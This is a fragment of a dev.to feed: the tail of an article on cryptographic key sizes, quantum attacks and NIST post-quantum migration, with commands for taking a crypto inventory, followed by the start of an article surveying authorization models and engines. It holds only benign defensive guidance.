&lt;th&gt;Quantum Security&lt;/th&gt;
&lt;th&gt;Verdict&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AES-128&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;128 bit&lt;/td&gt;
&lt;td&gt;→ &lt;strong&gt;64 bit&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;❌ Not enough&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AES-192&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;192 bit&lt;/td&gt;
&lt;td&gt;→ &lt;strong&gt;96 bit&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;⚠️ Marginal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AES-256&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;256 bit&lt;/td&gt;
&lt;td&gt;→ &lt;strong&gt;128 bit&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;✅ Sufficient&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;One caveat, though. These numbers assume Grover's algorithm running under ideal conditions. Actually attacking AES-128 with Grover would require enormous quantum resources (millions of high-quality qubits and impractically deep circuits), orders of magnitude beyond current quantum computers, which top out at a few thousand physical qubits. Still, for long-term security, moving to AES-256 is the safe bet.&lt;/p&gt;

&lt;p&gt;The crucial difference from Shor is that Grover &lt;strong&gt;can be countered by using longer keys&lt;/strong&gt;. AES-256 maintains 128-bit security even against quantum computers. No need to change the algorithm. Just use longer keys.&lt;/p&gt;

&lt;p&gt;This is why NIST is saying "use AES-256, use SHA-384 or above."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqpajkbjsoliqcx19j1so.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqpajkbjsoliqcx19j1so.png" alt="Quantum" width="611" height="506"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h2&gt;
  
  
  7. Harvest Now, Decrypt Later: Today's Data, Broken Tomorrow
&lt;/h2&gt;

&lt;p&gt;"Practical quantum computers are still years away, right?"&lt;/p&gt;

&lt;p&gt;That is the most dangerous assumption. There is an attack model called Harvest Now, Decrypt Later (HNDL).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1mvfdid1kg9omwptih0h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1mvfdid1kg9omwptih0h.png" alt="Attack" width="736" height="606"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Attackers intercept encrypted data &lt;strong&gt;now&lt;/strong&gt; and store it, then decrypt it once quantum computers become viable. The NSA and CISA have warned that nation-state actors are already in this "collection phase."&lt;/p&gt;

&lt;p&gt;The critical question is: how long does your data need to stay confidential? If a medical record encrypted today gets decrypted 20 years from now, that is a real data breach. Before quantum computers arrive, long-lived sensitive data needs to be re-protected with quantum-resistant methods.&lt;/p&gt;


&lt;h2&gt;
  
  
  8. Post-Quantum Cryptography (PQC) Key Sizes
&lt;/h2&gt;

&lt;p&gt;So what cryptography can actually withstand quantum computers? In August 2024, NIST officially published three post-quantum cryptography standards.&lt;/p&gt;
&lt;h3&gt;
  
  
  ML-KEM (FIPS 203): Key Encapsulation
&lt;/h3&gt;

&lt;p&gt;Formerly known as CRYSTALS-Kyber. Replaces RSA key exchange and ECDH.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Security&lt;/th&gt;
&lt;th&gt;Public Key&lt;/th&gt;
&lt;th&gt;Ciphertext&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-KEM-512&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-128 equiv.&lt;/td&gt;
&lt;td&gt;800 bytes&lt;/td&gt;
&lt;td&gt;768 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-KEM-768&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-192 equiv.&lt;/td&gt;
&lt;td&gt;1,184 bytes&lt;/td&gt;
&lt;td&gt;1,088 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-KEM-1024&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-256 equiv.&lt;/td&gt;
&lt;td&gt;1,568 bytes&lt;/td&gt;
&lt;td&gt;1,568 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h3&gt;
  
  
  ML-DSA (FIPS 204): Digital Signatures
&lt;/h3&gt;

&lt;p&gt;Formerly known as CRYSTALS-Dilithium. Replaces RSA signatures and ECDSA.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Security&lt;/th&gt;
&lt;th&gt;Public Key&lt;/th&gt;
&lt;th&gt;Signature&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-DSA-44&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-128 equiv.&lt;/td&gt;
&lt;td&gt;1,312 bytes&lt;/td&gt;
&lt;td&gt;2,420 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-DSA-65&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-192 equiv.&lt;/td&gt;
&lt;td&gt;1,952 bytes&lt;/td&gt;
&lt;td&gt;3,309 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-DSA-87&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-256 equiv.&lt;/td&gt;
&lt;td&gt;2,592 bytes&lt;/td&gt;
&lt;td&gt;4,627 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h3&gt;
  
  
  SLH-DSA (FIPS 205): Hash-Based Signatures
&lt;/h3&gt;

&lt;p&gt;Formerly known as SPHINCS+. Positioned as a backup for ML-DSA. It relies on a different mathematical foundation (hash functions) than the lattice-based ML-DSA, so it serves as insurance in case a vulnerability is found in ML-DSA.&lt;/p&gt;
&lt;h3&gt;
  
  
  Comparing Legacy Crypto and PQC Key Sizes
&lt;/h3&gt;

&lt;p&gt;This is where PQC hurts. Quantum resistance comes at the cost of larger keys and signatures.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;ECDSA P-256&lt;/th&gt;
&lt;th&gt;RSA-3072&lt;/th&gt;
&lt;th&gt;ML-DSA-65&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Public Key&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;64 bytes&lt;/td&gt;
&lt;td&gt;384 bytes&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;1,952 bytes&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Signature&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;64 bytes&lt;/td&gt;
&lt;td&gt;384 bytes&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;3,309 bytes&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;128 bit&lt;/td&gt;
&lt;td&gt;128 bit&lt;/td&gt;
&lt;td&gt;192 bit (quantum-resistant)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;ML-DSA-65's public key is &lt;strong&gt;roughly 30x&lt;/strong&gt; that of ECDSA P-256. This directly impacts TLS handshake sizes and certificate chains. That is why hybrid approaches (combining legacy crypto + PQC) are currently recommended. The transition will be gradual, not a full switchover all at once.&lt;/p&gt;
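&lt;p&gt;As a back-of-the-envelope sketch (my own arithmetic from the table above, not a measured handshake):&lt;/p&gt;

```python
# Signature-scheme sizes in bytes, taken from the comparison table above.
schemes = {
    "ECDSA P-256": {"public_key": 64, "signature": 64},
    "RSA-3072":    {"public_key": 384, "signature": 384},
    "ML-DSA-65":   {"public_key": 1952, "signature": 3309},
}

baseline = schemes["ECDSA P-256"]["public_key"]
for name, s in schemes.items():
    ratio = s["public_key"] / baseline
    print(f'{name}: public key x{ratio:.1f} vs P-256')

# Each certificate carries a public key plus a signature, so a three-cert
# chain signed end-to-end with ML-DSA-65 adds about 3 * (1952 + 3309) bytes,
# roughly 15 KB, versus under 0.4 KB for an all-ECDSA chain.
chain_overhead = 3 * (1952 + 3309)
print(chain_overhead)
```

&lt;p&gt;That order-of-magnitude jump in handshake bytes is the cost the hybrid approach is trying to amortize.&lt;/p&gt;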


&lt;h2&gt;
  
  
  9. What to Do in 2026
&lt;/h2&gt;

&lt;p&gt;Theory is great. But what should you actually do?&lt;/p&gt;
&lt;h3&gt;
  
  
  Start with a Crypto Inventory
&lt;/h3&gt;

&lt;p&gt;Figuring out what your systems are currently using is step one.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check your server's TLS certificate&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; | openssl s_client &lt;span class="nt"&gt;-connect&lt;/span&gt; example.com:443 2&amp;gt;/dev/null &lt;span class="se"&gt;\&lt;/span&gt;
  | openssl x509 &lt;span class="nt"&gt;-noout&lt;/span&gt; &lt;span class="nt"&gt;-text&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s2"&gt;"Public Key Algorithm|Public-Key"&lt;/span&gt;

&lt;span class="c"&gt;# Check your SSH keys&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;key &lt;span class="k"&gt;in&lt;/span&gt; ~/.ssh/id_&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;ssh-keygen &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; 2&amp;gt;/dev/null
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What to check:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Are your TLS certificates using ECDSA (P-256 or above)? If they are still RSA-2048, start planning the migration.&lt;/li&gt;
&lt;li&gt;Are your SSH keys Ed25519? If they are still RSA-2048, regenerate them with &lt;code&gt;ssh-keygen -t ed25519&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Are your JWT signatures using ES256 / EdDSA? If RS256, consider switching.&lt;/li&gt;
&lt;li&gt;Are you using AES-256 for symmetric encryption? Migrate long-lived data from AES-128.&lt;/li&gt;
&lt;/ul&gt;
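&lt;p&gt;For the JWT item, you can read the declared algorithm straight out of a token's header without verifying anything. A minimal sketch (the sample token below is fabricated for illustration):&lt;/p&gt;

```python
import base64
import json

def jwt_alg(token: str) -> str:
    """Return the signing algorithm declared in a JWT's header."""
    header_b64 = token.split(".")[0]
    # JWTs use unpadded base64url; restore padding before decoding.
    header_b64 += "=" * (-len(header_b64) % 4)
    header = json.loads(base64.urlsafe_b64decode(header_b64))
    return header["alg"]

# A fabricated token with an RS256 header, purely for illustration:
sample_header = base64.urlsafe_b64encode(
    json.dumps({"alg": "RS256", "typ": "JWT"}).encode()
).rstrip(b"=").decode()
token = sample_header + ".e30.sig"
print(jwt_alg(token))  # RS256 -- a candidate for migration to ES256/EdDSA
```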

&lt;h3&gt;
  
  
  Build Crypto Agility into Your Architecture
&lt;/h3&gt;

&lt;p&gt;No cryptographic algorithm lasts forever. RSA and ECC both have expiration dates.&lt;/p&gt;

&lt;p&gt;The important thing is to not hardcode algorithms. Make them configurable via config files or environment variables so that when NIST publishes new recommendations, you can switch with a config change. If you have to rewrite code and redeploy to every environment, you are looking at months of work.&lt;/p&gt;

&lt;p&gt;Combined with shorter certificate lifetimes (SC-081v3 brings the max down to 47 days by 2029), you can automatically switch algorithms at the next renewal cycle. If you are already auto-renewing certificates with ACME, the PQC transition is a natural extension of that.&lt;/p&gt;
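&lt;p&gt;What "not hardcoding" can look like in practice, as a minimal sketch (&lt;code&gt;SIGNING_ALG&lt;/code&gt; is a made-up variable name, not a standard):&lt;/p&gt;

```python
import os

# Hypothetical sketch: choose the signing algorithm from configuration
# instead of hardcoding it, so a future switch (say, ES256 to ML-DSA-65)
# is a config change rather than a code change and redeploy.
SUPPORTED = {"ES256", "EdDSA", "ML-DSA-65"}

def signing_alg() -> str:
    alg = os.environ.get("SIGNING_ALG", "ES256")
    if alg not in SUPPORTED:
        raise ValueError(f"unsupported signing algorithm: {alg}")
    return alg

print(signing_alg())  # ES256 unless SIGNING_ALG overrides it
```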




&lt;h2&gt;
  
  
  Takeaways
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Key length and security bits are different things.&lt;/strong&gt; AES-128 has 128-bit security, but RSA-2048 only has 112. The efficiency of the best known attack against each algorithm determines how many key bits it actually needs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why ECC gets away with short keys.&lt;/strong&gt; GNFS against RSA runs in sub-exponential time, and the security decay ratio gets worse with longer keys (roughly 1/18 for RSA-2048, roughly 1/60 for RSA-15360). Pollard's rho against ECC stays at 1/2 regardless, so short keys provide equal or better security.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RSA-2048 gets deprecated in 2030.&lt;/strong&gt; Per NIST IR 8547. By 2035, all quantum-vulnerable public key crypto, including RSA-3072, P-256, and P-384, will be prohibited.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quantum computers are not a key length problem.&lt;/strong&gt; Shor's algorithm destroys RSA and ECC at the algorithmic level. Longer keys do not help. Migration to post-quantum crypto (ML-KEM, ML-DSA) is required.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Grover's algorithm can be handled with longer keys.&lt;/strong&gt; It halves AES security, but AES-256 still maintains 128-bit security.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Run a crypto inventory now.&lt;/strong&gt; Know what your systems are using and build in crypto agility.&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/sp/800-57-part-1/rev-5/final" rel="noopener noreferrer"&gt;NIST SP 800-57 Part 1 Rev. 5: Recommendation for Key Management&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/sp/800-131a/rev-2/final" rel="noopener noreferrer"&gt;NIST SP 800-131A Rev. 2: Transitioning the Use of Cryptographic Algorithms and Key Lengths&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/nistir/8547/final" rel="noopener noreferrer"&gt;NIST IR 8547: Transition to Post-Quantum Cryptography Standards&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/fips/203/final" rel="noopener noreferrer"&gt;FIPS 203: Module-Lattice-Based Key-Encapsulation Mechanism Standard (ML-KEM)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/fips/204/final" rel="noopener noreferrer"&gt;FIPS 204: Module-Lattice-Based Digital Signature Standard (ML-DSA)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/fips/205/final" rel="noopener noreferrer"&gt;FIPS 205: Stateless Hash-Based Digital Signature Standard (SLH-DSA)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defense.gov/2022/Sep/07/2003071834/-1/-1/0/CSA_CNSA_2.0_ALGORITHMS_.PDF" rel="noopener noreferrer"&gt;CNSA 2.0: Commercial National Security Algorithm Suite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/projects/post-quantum-cryptography" rel="noopener noreferrer"&gt;NIST Post-Quantum Cryptography: Resource Center&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>cryptography</category>
      <category>beginners</category>
      <category>todayilearned</category>
    </item>
    <item>
      <title>Why I Built awesome-authorization: Mapping the World of Auth Engines onto a Single Page</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Sat, 18 Apr 2026 15:16:48 +0000</pubDate>
      <link>https://dev.to/kanywst/why-i-built-awesome-authorization-mapping-the-world-of-auth-engines-onto-a-single-page-4mof</link>
      <guid>https://dev.to/kanywst/why-i-built-awesome-authorization-mapping-the-world-of-auth-engines-onto-a-single-page-4mof</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;"Which authorization engine should I use?"&lt;/p&gt;

&lt;p&gt;Very few people can answer this instantly. OPA, Cedar, OpenFGA, SpiceDB, Casbin, Cerbos... That’s six just off the top of my head. They are based on entirely different access control models (RBAC, ABAC, ReBAC), with different design philosophies and use cases.&lt;/p&gt;

&lt;p&gt;I've always been an auth nerd. I wrote an AuthZEN-compatible plugin for OPA, read through the SPIFFE/SPIRE implementations, and deep-dived into the Google Zanzibar paper. Through all of this, I realized something: &lt;strong&gt;There is no single place to get a bird's-eye view of the entire authorization landscape.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A repository called &lt;code&gt;awesome-authorization&lt;/code&gt; already existed. However, it was mostly a collection of articles and concepts—it didn't answer the practical question of "What engines actually exist and how do they differ?". With AuthZEN 1.0 officially approved, the authorization space is moving fast, but the information is too scattered to track.&lt;/p&gt;

&lt;p&gt;So, I built one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/kanywst/awesome-authorization" rel="noopener noreferrer"&gt;awesome-authorization&lt;/a&gt;&lt;/strong&gt; : A curated list of tools, frameworks, standards, and learning resources for authorization and access control.&lt;/p&gt;

&lt;p&gt;In this post, I want to explain why this list needed to exist and map out the state of authorization engines in 2026.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Setting the Stage: PEP vs. PDP
&lt;/h2&gt;

&lt;p&gt;Before looking at the engines themselves, let's clarify where authorization sits within the architecture and what exactly an authorization engine—or Policy Decision Point (PDP)—does.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8stievz85oupu3uzc5eu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8stievz85oupu3uzc5eu.png" alt="PEP vs PDP" width="442" height="866"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Authentication (Who are you?) → Token Issuance → Authorization (What can you do?) → Resource Access. In this flow, the authorization engine (PDP) and the AuthZEN API are strictly responsible for step 4: "Query AuthZ Decision."&lt;/p&gt;

&lt;p&gt;OAuth 2.0 and AuthZEN operate on different layers. OAuth is about passing tokens between a client and a resource server. AuthZEN is about the application asking a policy engine for a decision. I see articles conflating these two all the time, but they are entirely different beasts.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. The Cambrian Explosion of Authorization Engines
&lt;/h2&gt;

&lt;p&gt;Let’s look at reality. As of April 2026, here is what the major authorization engine landscape looks like.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5925j57q2lqixw8i49zv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5925j57q2lqixw8i49zv.png" alt="Authorization Engines" width="800" height="488"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That's a lot. And while they might look similar from the outside, their foundational design philosophies are radically different.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. You Can't Choose If You Don't Know the Models
&lt;/h2&gt;

&lt;p&gt;The very first thing to understand when picking an authorization engine is the underlying &lt;strong&gt;access control model&lt;/strong&gt;. If you skip this, you will inevitably hit a wall where the engine simply cannot express your use case.&lt;/p&gt;

&lt;h3&gt;
  
  
  RBAC: Managing by Roles
&lt;/h3&gt;

&lt;p&gt;The simplest approach. Assign roles to users, and bind permissions to those roles.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5gndnd1zet8ipx8gl9w9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5gndnd1zet8ipx8gl9w9.png" alt="RBAC" width="557" height="157"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Kubernetes RBAC is a perfect example. It's simple, but as conditions grow, you suffer from Role Explosion. Try expressing "Only full-time engineers in the Tokyo office assigned to Project A can access the production environment" in strict RBAC. The number of role permutations becomes unmanageable.&lt;/p&gt;
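&lt;p&gt;The blow-up is easy to make concrete: each condition strict RBAC has to encode becomes another dimension of the role matrix (the attribute values below are invented):&lt;/p&gt;

```python
from itertools import product

# Four invented attribute dimensions that strict RBAC would have to
# flatten into distinct roles.
offices = ["tokyo", "osaka", "nyc"]
employment = ["fulltime", "contractor"]
projects = ["project-a", "project-b", "project-c"]
jobs = ["engineer", "sales"]

roles = [
    f"{o}-{e}-{p}-{j}"
    for o, e, p, j in product(offices, employment, projects, jobs)
]
print(len(roles))  # 36 roles for just four small attributes
```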

&lt;h3&gt;
  
  
  ABAC: Deciding by Attributes
&lt;/h3&gt;

&lt;p&gt;Decisions are evaluated based on the &lt;strong&gt;attributes&lt;/strong&gt; of the user, the resource, and the environment.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fk1k1i34y54tvdx5wib.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fk1k1i34y54tvdx5wib.png" alt="ABAC" width="800" height="109"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is where OPA (Rego) and Cedar shine. It’s highly flexible, but the policies themselves can get complicated very quickly.&lt;/p&gt;
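&lt;p&gt;At its core, an ABAC decision is a predicate over attribute bags. A toy sketch (the attribute names are invented, and real engines express this in Rego or Cedar rather than application code):&lt;/p&gt;

```python
def allow(subject: dict, resource: dict, env: dict) -> bool:
    # Toy rule: engineers in the Tokyo office may read documents
    # during business hours (09:00-17:59). Purely illustrative.
    return (
        subject["dept"] == "eng"
        and subject["office"] == "tokyo"
        and resource["kind"] == "document"
        and env["hour"] in range(9, 18)
    )

print(allow({"dept": "eng", "office": "tokyo"},
            {"kind": "document"}, {"hour": 10}))  # True
```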

&lt;h3&gt;
  
  
  ReBAC: Deciding by Relationships
&lt;/h3&gt;

&lt;p&gt;Popularized by the Google Zanzibar paper. It manages &lt;strong&gt;relationships&lt;/strong&gt; as a graph—for example, "alice is a viewer of doc:readme," or "all members of the eng group are viewers."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmrkbnp4rs5k333b3j40e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmrkbnp4rs5k333b3j40e.png" alt="ReBac" width="527" height="321"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SpiceDB, OpenFGA, and Permify implement this model. It mirrors how sharing works in Google Drive, making it a natural fit for collaborative apps. However, it struggles with attribute-based conditions like "allow access only during business hours."&lt;/p&gt;
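&lt;p&gt;The core of the model fits in a few lines: a set of relationship tuples plus userset expansion. A toy sketch in the spirit of Zanzibar's tuples (not how SpiceDB or OpenFGA are actually implemented):&lt;/p&gt;

```python
# Relationship tuples: (object, relation, subject). A subject ending in
# "#member" is a userset, granting the relation to every group member.
tuples = {
    ("doc:readme", "viewer", "user:alice"),
    ("doc:readme", "viewer", "group:eng#member"),
    ("group:eng", "member", "user:bob"),
}

def check(obj: str, relation: str, user: str) -> bool:
    if (obj, relation, user) in tuples:
        return True
    # Expand usersets by recursing into group membership.
    for (o, r, subject) in tuples:
        if o == obj and r == relation and subject.endswith("#member"):
            group = subject.split("#")[0]
            if check(group, "member", user):
                return True
    return False

print(check("doc:readme", "viewer", "user:bob"))  # True, via eng membership
```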

&lt;h3&gt;
  
  
  So, Which One Should You Use?
&lt;/h3&gt;

&lt;p&gt;Roughly speaking:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What you want to do&lt;/th&gt;
&lt;th&gt;Model&lt;/th&gt;
&lt;th&gt;Candidates&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Simple role management&lt;/td&gt;
&lt;td&gt;RBAC&lt;/td&gt;
&lt;td&gt;Casbin, Spring Security, Kubernetes RBAC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Complex branching logic (Attributes)&lt;/td&gt;
&lt;td&gt;ABAC&lt;/td&gt;
&lt;td&gt;OPA, Cedar, Cerbos&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google Drive-style sharing / Hierarchies&lt;/td&gt;
&lt;td&gt;ReBAC&lt;/td&gt;
&lt;td&gt;SpiceDB, OpenFGA, Permify&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes policy control&lt;/td&gt;
&lt;td&gt;ABAC/RBAC&lt;/td&gt;
&lt;td&gt;OPA Gatekeeper, Kyverno&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;In reality, you often end up with a hybrid of RBAC + ABAC or a combination of ReBAC + ABAC. Cedar natively supports both RBAC and ABAC, while Aserto's Topaz combines Zanzibar-style ReBAC with an OPA engine for ABAC.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. AuthZEN: Standardizing the AuthZ API
&lt;/h2&gt;

&lt;p&gt;All the authorization engines we’ve looked at share a glaring problem: &lt;strong&gt;Their APIs are completely fragmented.&lt;/strong&gt;&lt;/p&gt;

